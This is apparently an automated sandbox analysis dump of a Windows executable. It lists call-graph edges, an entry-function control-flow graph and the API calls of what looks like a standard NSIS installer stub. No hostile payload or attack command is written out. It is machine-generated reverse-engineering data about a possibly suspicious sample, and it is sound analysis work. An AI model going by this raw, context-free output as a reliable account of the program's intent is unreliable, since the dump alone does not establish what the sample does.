3883->3889 3884->3881 3885->3801 3890 403aa1 3886->3890 3891 40399b 3887->3891 3893 405a09 3 API calls 3888->3893 3889->3888 3892 4039bc GetFileAttributesW 3889->3892 3890->3885 3895 403b74 19 API calls 3890->3895 3891->3883 3894 4039c8 3892->3894 3896 4039d8 3893->3896 3894->3888 3897 405a55 2 API calls 3894->3897 3898 403ab2 3895->3898 4078 406055 lstrcpynW 3896->4078 3897->3888 3900 403b41 3898->3900 3901 403abe ShowWindow 3898->3901 4079 405287 OleInitialize 3900->4079 3903 4063bf 3 API calls 3901->3903 3904 403ad6 3903->3904 3906 403ae4 GetClassInfoW 3904->3906 3908 4063bf 3 API calls 3904->3908 3905 403b47 3907 403b63 3905->3907 3912 403b4b 3905->3912 3910 403af8 GetClassInfoW RegisterClassW 3906->3910 3911 403b0e DialogBoxParamW 3906->3911 3909 40140b 2 API calls 3907->3909 3908->3906 3909->3885 3910->3911 3913 40140b 2 API calls 3911->3913 3912->3885 3914 40140b 2 API calls 3912->3914 3913->3885 3914->3885 3915->3751 4094 406055 lstrcpynW 3916->4094 3918 405b22 4095 405ab4 CharNextW CharNextW 3918->4095 3921 4035c3 3921->3801 3930 406055 lstrcpynW 3921->3930 3922 4062e9 5 API calls 3923 405b38 3922->3923 3923->3921 3924 405b69 lstrlenW 3923->3924 3929 405a55 2 API calls 3923->3929 4101 406398 FindFirstFileW 3923->4101 3924->3923 3925 405b74 3924->3925 3926 405a09 3 API calls 3925->3926 3928 405b79 GetFileAttributesW 3926->3928 3928->3921 3929->3924 3930->3784 3931->3788 3933 4037dc 3932->3933 3934 4037ce CloseHandle 3932->3934 4104 403809 3933->4104 3934->3933 3940 4057af 3939->3940 3941 403616 ExitProcess 3940->3941 3942 4057c3 MessageBoxIndirectW 3940->3942 3942->3941 3944 40642b 5 API calls 3943->3944 3945 403623 lstrcatW 3944->3945 3945->3775 3945->3776 3947 403665 3946->3947 3948 4056d4 GetLastError 3946->3948 3947->3790 3948->3947 3949 4056e3 SetFileSecurityW 3948->3949 3949->3947 3950 4056f9 GetLastError 3949->3950 3950->3947 3952 405710 3951->3952 3953 405714 GetLastError 3951->3953 3952->3790 3953->3952 3954->3791 3955->3803 3965 406084 3956->3965 3957 4062cf 3958 4036c6 DeleteFileW 3957->3958 4163 406055 lstrcpynW 3957->4163 3958->3797 3958->3803 3960 406137 GetVersion 3960->3965 3961 40629d lstrlenW 3961->3965 3964 406077 10 API calls 3964->3961 3965->3957 3965->3960 3965->3961 3965->3964 3966 405f22 3 API calls 3965->3966 3967 4061b2 GetSystemDirectoryW 3965->3967 3968 4061c5 GetWindowsDirectoryW 3965->3968 3969 4062e9 5 API calls 3965->3969 3970 4061f9 SHGetSpecialFolderLocation 3965->3970 3971 406077 10 API calls 3965->3971 3972 40623e lstrcatW 3965->3972 4161 405f9c wsprintfW 3965->4161 4162 406055 lstrcpynW 3965->4162 3966->3965 3967->3965 3968->3965 3969->3965 3970->3965 3973 406211 SHGetPathFromIDListW CoTaskMemFree 3970->3973 3971->3965 3972->3965 3973->3965 3975 405f17 3974->3975 3976 405f0a 3974->3976 3975->3803 4164 405d84 lstrcpyW 3976->4164 3979 405774 3978->3979 3980 405768 CloseHandle 3978->3980 3979->3803 3980->3979 3982 401389 2 API calls 3981->3982 3983 401420 3982->3983 3983->3761 3990 4062f6 3984->3990 3985 40636c 3986 406371 CharPrevW 3985->3986 3988 406392 3985->3988 3986->3985 3987 40635f CharNextW 3987->3985 3987->3990 3988->3824 3989 405a36 CharNextW 3989->3990 3990->3985 3990->3987 3990->3989 3991 40634b CharNextW 3990->3991 3992 40635a CharNextW 3990->3992 3991->3990 3992->3987 3994 40328d 3993->3994 3995 405a25 lstrcatW 3993->3995 3994->3827 3995->3994 3997 405c66 GetTickCount GetTempFileNameW 3996->3997 3998 40329e 3997->3998 3999 405c9c 3997->3999 3998->3738 3999->3997 3999->3998 4000->3833 4001->3835 4003 405a63 4002->4003 4004 402e5a 4003->4004 4005 405a69 CharPrevW 4003->4005 4006 406055 lstrcpynW 4004->4006 4005->4003 4005->4004 4006->3839 4008 402d93 4007->4008 4009 402dab 4007->4009 4010 402da3 4008->4010 4011 402d9c DestroyWindow 4008->4011 4012 402db3 4009->4012 4013 402dbb GetTickCount 4009->4013 4010->3842 4011->4010 4043 406467 4012->4043 4015 402dc9 CreateDialogParamW ShowWindow 4013->4015 4016 402dec 4013->4016 4015->4016 4016->3842 4018->3848 4020 403040 4019->4020 4021 40306e 4020->4021 4049 403258 SetFilePointer 4020->4049 4023 403242 ReadFile 4021->4023 4024 403079 4023->4024 4025 4031db 4024->4025 4026 40308b GetTickCount 4024->4026 4034 4031c5 4024->4034 4027 40321d 4025->4027 4032 4031df 4025->4032 4026->4034 4038 4030da 4026->4038 4028 403242 ReadFile 4027->4028 4028->4034 4029 403242 ReadFile 4029->4038 4030 403242 ReadFile 4030->4032 4031 405cdc WriteFile 4031->4032 4032->4030 4032->4031 4032->4034 4033 403130 GetTickCount 4033->4038 4034->3856 4035 403155 MulDiv wsprintfW 4050 4051b4 4035->4050 4038->4029 4038->4033 4038->4034 4038->4035 4047 405cdc WriteFile 4038->4047 4061 405cad ReadFile 4039->4061 4042->3850 4044 406484 PeekMessageW 4043->4044 4045 402db9 4044->4045 4046 40647a DispatchMessageW 4044->4046 4045->3842 4046->4044 4048 405cfa 4047->4048 4048->4038 4049->4021 4051 405271 4050->4051 4052 4051cf 4050->4052 4051->4038 4053 4051eb lstrlenW 4052->4053 4054 406077 18 API calls 4052->4054 4055 405214 4053->4055 4056 4051f9 lstrlenW 4053->4056 4054->4053 4058 405227 4055->4058 4059 40521a SetWindowTextW 4055->4059 4056->4051 4057 40520b lstrcatW 4056->4057 4057->4055 4058->4051 4060 40522d SendMessageW SendMessageW SendMessageW 4058->4060 4059->4058 4060->4051 4062 403255 4061->4062 4062->3858 4063->3866 4065 403b88 4064->4065 4086 405f9c wsprintfW 4065->4086 4067 403bf9 4068 406077 18 API calls 4067->4068 4069 403c05 SetWindowTextW 4068->4069 4070 403c21 4069->4070 4071 403929 4069->4071 4070->4071 4072 406077 18 API calls 4070->4072 4071->3872 4072->4070 4074 4038fa 4073->4074 4075 405f56 RegQueryValueExW 4073->4075 4074->3868 4074->3869 4076 405f77 RegCloseKey 4075->4076 4076->4074 4078->3874 4087 404165 4079->4087 4081 4052aa 4085 4052d1 4081->4085 4090 401389 4081->4090 4082 404165 SendMessageW 4083 4052e3 OleUninitialize 4082->4083 4083->3905 4085->4082 4086->4067 4088 40417d 4087->4088 4089 40416e SendMessageW 4087->4089 4088->4081 4089->4088 4092 401390 4090->4092 4091 4013fe 4091->4081 4092->4091 4093 4013cb MulDiv SendMessageW 4092->4093 4093->4092 4094->3918 4096 405ad1 4095->4096 4097 405ae3 4095->4097 4096->4097 4098 405ade CharNextW 4096->4098 4099 405a36 CharNextW 4097->4099 4100 405b07 4097->4100 4098->4100 4099->4097 4100->3921 4100->3922 4102 4063b9 4101->4102 4103 4063ae FindClose 4101->4103 4102->3923 4103->4102 4105 403817 4104->4105 4106 4037e1 4105->4106 4107 40381c FreeLibrary GlobalFree 4105->4107 4108 405846 4106->4108 4107->4106 4107->4107 4109 405b11 18 API calls 4108->4109 4110 405866 4109->4110 4111 405885 4110->4111 4112 40586e DeleteFileW 4110->4112 4114 4059b0 4111->4114 4148 406055 lstrcpynW 4111->4148 4113 4035f6 OleUninitialize 4112->4113 4113->3757 4113->3758 4114->4113 4119 406398 2 API calls 4114->4119 4116 4058ab 4117 4058b1 lstrcatW 4116->4117 4118 4058be 4116->4118 4120 4058c4 4117->4120 4121 405a55 2 API calls 4118->4121 4124 4059ca 4119->4124 4122 4058d4 lstrcatW 4120->4122 4123 4058ca 4120->4123 4121->4120 4125 4058df lstrlenW FindFirstFileW 4122->4125 4123->4122 4123->4125 4124->4113 4126 4059ce 4124->4126 4127 405901 4125->4127 4128 4059a5 4125->4128 4129 405a09 3 API calls 4126->4129 4131 405988 FindNextFileW 4127->4131 4141 405846 62 API calls 4127->4141 4143 4051b4 25 API calls 4127->4143 4145 4051b4 25 API calls 4127->4145 4147 405ef6 38 API calls 4127->4147 4149 406055 lstrcpynW 4127->4149 4150 4057fe 4127->4150 4128->4114 4130 4059d4 4129->4130 4132 4057fe 5 API calls 4130->4132 4131->4127 4135 40599e FindClose 4131->4135 4134 4059e0 4132->4134 4136 4059e4 4134->4136 4137 4059fa 4134->4137 4135->4128 4136->4113 4140 4051b4 25 API calls 4136->4140 4138 4051b4 25 API calls 4137->4138 4138->4113 4142 4059f1 4140->4142 4141->4127 4144 405ef6 38 API calls 4142->4144 4143->4131 4146 4059f8 4144->4146 4145->4127 4146->4113 4147->4127 4148->4116 4149->4127 4158 405c05 GetFileAttributesW 4150->4158 4153 405821 DeleteFileW 4156 405827 4153->4156 4154 405819 RemoveDirectoryW 4154->4156 4155 40582b 4155->4127 4156->4155 4157 405837 SetFileAttributesW 4156->4157 4157->4155 4159 40580a 4158->4159 4160 405c17 SetFileAttributesW 4158->4160 4159->4153 4159->4154 4159->4155 4160->4159 4161->3965 4162->3965 4163->3958 4165 405dd2 GetShortPathNameW 4164->4165 4166 405dac 4164->4166 4168 405ef1 4165->4168 4169 405de7 4165->4169 4191 405c2a GetFileAttributesW CreateFileW 4166->4191 4168->3975 4169->4168 4171 405def wsprintfA 4169->4171 4170 405db6 CloseHandle GetShortPathNameW 4170->4168 4172 405dca 4170->4172 4173 406077 18 API calls 4171->4173 4172->4165 4172->4168 4174 405e17 4173->4174 4192 405c2a GetFileAttributesW CreateFileW 4174->4192 4176 405e24 4176->4168 4177 405e33 GetFileSize GlobalAlloc 4176->4177 4178 405e55 4177->4178 4179 405eea CloseHandle 4177->4179 4180 405cad ReadFile 4178->4180 4179->4168 4181 405e5d 4180->4181 4181->4179 4193 405b8f lstrlenA 4181->4193 4184 405e74 lstrcpyA 4187 405e96 4184->4187 4185 405e88 4186 405b8f 4 API calls 4185->4186 4186->4187 4188 405ecd SetFilePointer 4187->4188 4189 405cdc WriteFile 4188->4189 4190 405ee3 GlobalFree 4189->4190 4190->4179 4191->4170 4192->4176 4194 405bd0 lstrlenA 4193->4194 4195 405bd8 4194->4195 4196 405ba9 lstrcmpiA 4194->4196 4195->4184 4195->4185 4196->4195 4197 405bc7 CharNextA 4196->4197 4197->4194 5261 100010e1 5264 10001111 5261->5264 5262 100011d8 GlobalFree 5263 100012ba 2 API calls 5263->5264 5264->5262 5264->5263 5265 100011d3 5264->5265 5266 10001272 2 API calls 5264->5266 5267 10001164 GlobalAlloc 5264->5267 5268 100011f8 GlobalFree 5264->5268 5269 100011c4 GlobalFree 5264->5269 5270 100012e1 lstrcpyW 5264->5270 5265->5262 5266->5269 5267->5264 5268->5264 5269->5264 5270->5264 5271 401ca3 5272 402ba2 18 API calls 5271->5272 5273 401ca9 IsWindow 5272->5273 5274 401a05 5273->5274 5275 402a27 SendMessageW 5276 402a41 InvalidateRect 5275->5276 5277 402a4c 5275->5277 5276->5277 4565 405128 4566 405138 4565->4566 4567 40514c 4565->4567 4569 405195 4566->4569 4570 40513e 4566->4570 4568 405154 IsWindowVisible 4567->4568 4577 405174 4567->4577 4568->4569 4571 405161 4568->4571 4572 40519a CallWindowProcW 4569->4572 4573 404165 SendMessageW 4570->4573 4579 404a7e SendMessageW 4571->4579 4575 405148 4572->4575 4573->4575 4577->4572 4584 404afe 4577->4584 4580 404aa1 GetMessagePos ScreenToClient SendMessageW 4579->4580 4581 404add SendMessageW 4579->4581 4582 404ad5 4580->4582 4583 404ada 4580->4583 4581->4582 4582->4577 4583->4581 4593 406055 lstrcpynW 4584->4593 4586 404b11 4594 405f9c wsprintfW 4586->4594 4588 404b1b 4589 40140b 2 API calls 4588->4589 4590 404b24 4589->4590 4595 406055 lstrcpynW 4590->4595 4592 404b2b 4592->4569 4593->4586 4594->4588 4595->4592 4596 40242a 4607 402cc9 4596->4607 4598 402434 4599 402bbf 18 API calls 4598->4599 4600 40243d 4599->4600 4601 402448 RegQueryValueExW 4600->4601 4602 40281e 4600->4602 4603 402468 4601->4603 4606 40246e RegCloseKey 4601->4606 4603->4606 4611 405f9c wsprintfW 4603->4611 4606->4602 4608 402bbf 18 API calls 4607->4608 4609 402ce2 4608->4609 4610 402cf0 RegOpenKeyExW 4609->4610 4610->4598 4611->4606 5278 40422d lstrcpynW lstrlenW 5279 40172d 5280 402bbf 18 API calls 5279->5280 5281 401734 SearchPathW 5280->5281 5282 40174f 5281->5282 4612 404b30 GetDlgItem GetDlgItem 4613 404b82 7 API calls 4612->4613 4616 404d9b 4612->4616 4614 404c25 DeleteObject 4613->4614 4615 404c18 SendMessageW 4613->4615 4617 404c2e 4614->4617 4615->4614 4622 404e60 4616->4622 4626 404e7f 4616->4626 4629 404dfb 4616->4629 4618 404c3d 4617->4618 4619 404c65 4617->4619 4621 406077 18 API calls 4618->4621 4623 404119 19 API calls 4619->4623 4620 404f2b 4627 404f35 SendMessageW 4620->4627 4634 404f3d 4620->4634 4628 404c47 SendMessageW SendMessageW 4621->4628 4622->4626 4633 404e71 SendMessageW 4622->4633 4624 404c79 4623->4624 4630 404119 19 API calls 4624->4630 4625 405113 4632 404180 8 API calls 4625->4632 4626->4620 4626->4625 4631 404ed8 SendMessageW 4626->4631 4627->4634 4628->4617 4635 404a7e 5 API calls 4629->4635 4648 404c87 4630->4648 4631->4625 4637 404eed SendMessageW 4631->4637 4638 405121 4632->4638 4633->4626 4639 404f56 4634->4639 4640 404f4f ImageList_Destroy 4634->4640 4644 404f66 4634->4644 4647 404e0c 4635->4647 4636 4050d5 4636->4625 4645 4050e7 ShowWindow GetDlgItem ShowWindow 4636->4645 4643 404f00 4637->4643 4641 404f5f GlobalFree 4639->4641 4639->4644 4640->4639 4641->4644 4642 404d5c GetWindowLongW SetWindowLongW 4646 404d75 4642->4646 4653 404f11 SendMessageW 4643->4653 4644->4636 4659 404afe 4 API calls 4644->4659 4662 404fa1 4644->4662 4645->4625 4649 404d93 4646->4649 4650 404d7b ShowWindow 4646->4650 4647->4622 4648->4642 4652 404cd7 SendMessageW 4648->4652 4654 404d56 4648->4654 4657 404d13 SendMessageW 4648->4657 4658 404d24 SendMessageW 4648->4658 4669 40414e SendMessageW 4649->4669 4668 40414e SendMessageW 4650->4668 4652->4648 4653->4620 4654->4642 4654->4646 4656 404d8e 4656->4625 4657->4648 4658->4648 4659->4662 4660 4050ab InvalidateRect 4660->4636 4661 4050c1 4660->4661 4670 404a39 4661->4670 4663 404fcf SendMessageW 4662->4663 4664 404fe5 4662->4664 4663->4664 4664->4660 4665 405046 4664->4665 4667 405059 SendMessageW SendMessageW 4664->4667 4665->4667 4667->4664 4668->4656 4669->4616 4673 404970 4670->4673 4672 404a4e 4672->4636 4674 404989 4673->4674 4675 406077 18 API calls 4674->4675 4676 4049ed 4675->4676 4677 406077 18 API calls 4676->4677 4678 4049f8 4677->4678 4679 406077 18 API calls 4678->4679 4680 404a0e lstrlenW wsprintfW SetDlgItemTextW 4679->4680 4680->4672 5283 4045b4 5284 4045e0 5283->5284 5285 4045f1 5283->5285 5344 40577e GetDlgItemTextW 5284->5344 5287 4045fd GetDlgItem 5285->5287 5288 40465c 5285->5288 5291 404611 5287->5291 5289 404740 5288->5289 5298 406077 18 API calls 5288->5298 5342 4048ef 5288->5342 5289->5342 5346 40577e GetDlgItemTextW 5289->5346 5290 4045eb 5292 4062e9 5 API calls 5290->5292 5293 404625 SetWindowTextW 5291->5293 5296 405ab4 4 API calls 5291->5296 5292->5285 5297 404119 19 API calls 5293->5297 5295 404180 8 API calls 5300 404903 5295->5300 5301 40461b 5296->5301 5302 404641 5297->5302 5303 4046d0 SHBrowseForFolderW 5298->5303 5299 404770 5304 405b11 18 API calls 5299->5304 5301->5293 5308 405a09 3 API calls 5301->5308 5305 404119 19 API calls 5302->5305 5303->5289 5306 4046e8 CoTaskMemFree 5303->5306 5307 404776 5304->5307 5309 40464f 5305->5309 5310 405a09 3 API calls 5306->5310 5347 406055 lstrcpynW 5307->5347 5308->5293 5345 40414e SendMessageW 5309->5345 5317 4046f5 5310->5317 5313 404655 5316 40642b 5 API calls 5313->5316 5314 40472c SetDlgItemTextW 5314->5289 5315 40478d 5318 40642b 5 API calls 5315->5318 5316->5288 5317->5314 5319 406077 18 API calls 5317->5319 5325 404794 5318->5325 5321 404714 lstrcmpiW 5319->5321 5320 4047d5 5348 406055 lstrcpynW 5320->5348 5321->5314 5322 404725 lstrcatW 5321->5322 5322->5314 5324 4047dc 5326 405ab4 4 API calls 5324->5326 5325->5320 5330 405a55 2 API calls 5325->5330 5331 40482d 5325->5331 5327 4047e2 GetDiskFreeSpaceW 5326->5327 5329 404806 MulDiv 5327->5329 5327->5331 5329->5331 5330->5325 5332 40489e 5331->5332 5334 404a39 21 API calls 5331->5334 5333 4048c1 5332->5333 5335 40140b 2 API calls 5332->5335 5349 40413b EnableWindow 5333->5349 5336 40488b 5334->5336 5335->5333 5338 4048a0 SetDlgItemTextW 5336->5338 5339 404890 5336->5339 5338->5332 5341 404970 21 API calls 5339->5341 5340 4048dd 5340->5342 5350 404549 5340->5350 5341->5332 5342->5295 5344->5290 5345->5313 5346->5299 5347->5315 5348->5324 5349->5340 5351 404557 5350->5351 5352 40455c SendMessageW 5350->5352 5351->5352 5352->5342 5353 4027b4 5354 4027ba 5353->5354 5355 4027c2 FindClose 5354->5355 5356 402a4c 5354->5356 5355->5356 5357 4042b6 5358 4042ce 5357->5358 5362 4043e8 5357->5362 5363 404119 19 API calls 5358->5363 5359 404452 5360 404524 5359->5360 5361 40445c GetDlgItem 5359->5361 5368 404180 8 API calls 5360->5368 5364 4044e5 5361->5364 5365 404476 5361->5365 5362->5359 5362->5360 5366 404423 GetDlgItem SendMessageW 5362->5366 5367 404335 5363->5367 5364->5360 5373 4044f7 5364->5373 5365->5364 5372 40449c 6 API calls 5365->5372 5388 40413b EnableWindow 5366->5388 5370 404119 19 API calls 5367->5370 5371 40451f 5368->5371 5375 404342 CheckDlgButton 5370->5375 5372->5364 5376 40450d 5373->5376 5377 4044fd SendMessageW 5373->5377 5374 40444d 5379 404549 SendMessageW 5374->5379 5386 40413b EnableWindow 5375->5386 5376->5371 5378 404513 SendMessageW 5376->5378 5377->5376 5378->5371 5379->5359 5381 404360 GetDlgItem 5387 40414e SendMessageW 5381->5387 5383 404376 SendMessageW 5384 404393 GetSysColor 5383->5384 5385 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5383->5385 5384->5385 5385->5371 5386->5381 5387->5383 5388->5374 5389 401b37 5390 401b88 5389->5390 5392 401b44 5389->5392 5393 401bb2 GlobalAlloc 5390->5393 5394 401b8d 5390->5394 5391 401bcd 5395 406077 18 API calls 5391->5395 5404 402288 5391->5404 5392->5391 5397 401b5b 5392->5397 5396 406077 18 API calls 5393->5396 5394->5404 5410 406055 lstrcpynW 5394->5410 5399 402282 5395->5399 5396->5391 5408 406055 lstrcpynW 5397->5408 5402 40579a MessageBoxIndirectW 5399->5402 5401 401b9f GlobalFree 5401->5404 5402->5404 5403 401b6a 5409 406055 lstrcpynW 5403->5409 5406 401b79 5411 406055 lstrcpynW 5406->5411 5408->5403 5409->5406 5410->5401 5411->5404 5412 402537 5413 402562 5412->5413 5414 40254b 5412->5414 5416 402596 5413->5416 5417 402567 5413->5417 5415 402ba2 18 API calls 5414->5415 5424 402552 5415->5424 5419 402bbf 18 API calls 5416->5419 5418 402bbf 18 API calls 5417->5418 5421 40256e WideCharToMultiByte lstrlenA 5418->5421 5420 40259d lstrlenW 5419->5420 5420->5424 5421->5424 5422 4025ca 5423 4025e0 5422->5423 5425 405cdc WriteFile 5422->5425 5424->5422 5424->5423 5426 405d0b 5 API calls 5424->5426 5425->5423 5426->5422 5427 4014b8 5428 4014be 5427->5428 5429 401389 2 API calls 5428->5429 5430 4014c6 5429->5430 4709 4015b9 4710 402bbf 18 API calls 4709->4710 4711 4015c0 4710->4711 4712 405ab4 4 API calls 4711->4712 4724 4015c9 4712->4724 4713 401629 4715 40165b 4713->4715 4716 40162e 4713->4716 4714 405a36 CharNextW 4714->4724 4719 401423 25 API calls 4715->4719 4717 401423 25 API calls 4716->4717 4718 401635 4717->4718 4728 406055 lstrcpynW 4718->4728 4726 401653 4719->4726 4721 405700 2 API calls 4721->4724 4722 40571d 5 API calls 4722->4724 4723 401642 SetCurrentDirectoryW 4723->4726 4724->4713 4724->4714 4724->4721 4724->4722 4725 40160f GetFileAttributesW 4724->4725 4727 405683 4 API calls 4724->4727 4725->4724 4727->4724 4728->4723 5431 10002a7f 5432 10002a97 5431->5432 5433 1000158f 2 API calls 5432->5433 5434 10002ab2 5433->5434

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 7 4032de 1->7 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 7->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 27 4033b1-4033b7 24->27 28 4033aa-4033af 24->28 32 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->32 33 403526-403540 DeleteFileW call 402dee 25->33 30 4033b9-4033bd 27->30 31 4033be-4033c2 27->31 28->27 28->28 30->31 34 403480-40348d call 405a36 31->34 35 4033c8-4033ce 31->35 32->33 50 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 32->50 53 4035f1-403602 call 4037c4 OleUninitialize 33->53 54 403546-40354c 33->54 51 403491-403497 34->51 52 40348f-403490 34->52 36 4033d0-4033d7 35->36 37 4033e8-403421 35->37 41 4033d9-4033dc 36->41 42 4033de 36->42 43 403423-403428 37->43 44 40343e-403478 37->44 41->37 41->42 42->37 43->44 48 40342a-403432 43->48 44->34 49 40347a-40347e 44->49 58 403434-403437 48->58 59 403439 48->59 49->34 60 40349f-4034ad call 406055 49->60 50->33 50->53 51->24 62 40349d 51->62 52->51 71 403728-40372e 53->71 72 403608-403618 call 40579a ExitProcess 53->72 55 4035e1-4035e8 call 40389e 54->55 56 403552-40355d call 405a36 54->56 70 4035ed 55->70 73 4035ab-4035b5 56->73 74 40355f-403594 56->74 58->44 58->59 59->44 63 4034b2 60->63 62->63 63->25 70->53 76 403730-403746 GetCurrentProcess OpenProcessToken 71->76 77 4037ac-4037b4 71->77 81 4035b7-4035c5 call 405b11 73->81 82 40361e-403632 call 40571d lstrcatW 73->82 78 403596-40359a 74->78 84 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 76->84 85 40377c-40378a call 40642b 76->85 79 4037b6 77->79 80 4037ba-4037be ExitProcess 77->80 86 4035a3-4035a7 78->86 87 40359c-4035a1 78->87 79->80 81->53 97 4035c7-4035dd call 406055 * 2 81->97 98 403634-40363a lstrcatW 82->98 99 40363f-403659 lstrcatW lstrcmpiW 82->99 84->85 95 403798-4037a3 ExitWindowsEx 85->95 96 40378c-403796 85->96 86->78 92 4035a9 86->92 87->86 87->92 92->73 95->77 100 4037a5-4037a7 call 40140b 95->100 96->95 96->100 97->55 98->99 99->53 102 40365b-40365e 99->102 100->77 103 403660-403665 call 405683 102->103 104 403667 call 405700 102->104 113 40366c-40367a SetCurrentDirectoryW 103->113 104->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 124 40371c-403723 call 405ef6 122->124 123->122 125 4036e5-403705 call 405ef6 call 406077 call 405735 123->125 124->53 125->122 134 403707-40370e CloseHandle 125->134 134->122
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                              • GetVersion.KERNEL32 ref: 004032C8
                                                                                                              • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                              • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                              • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\FILHKLtCw0.exe",00000000), ref: 00403363
                                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\FILHKLtCw0.exe",00000020), ref: 0040338A
                                                                                                                • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                                • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                              • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                              • ExitProcess.KERNEL32 ref: 00403618
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FILHKLtCw0.exe",00000000,?), ref: 0040362B
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FILHKLtCw0.exe",00000000,?), ref: 0040363A
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FILHKLtCw0.exe",00000000,?), ref: 00403645
                                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FILHKLtCw0.exe",00000000,?), ref: 00403651
                                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                              • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\FILHKLtCw0.exe,0042AA28,00000001), ref: 004036DB
                                                                                                              • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                              • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
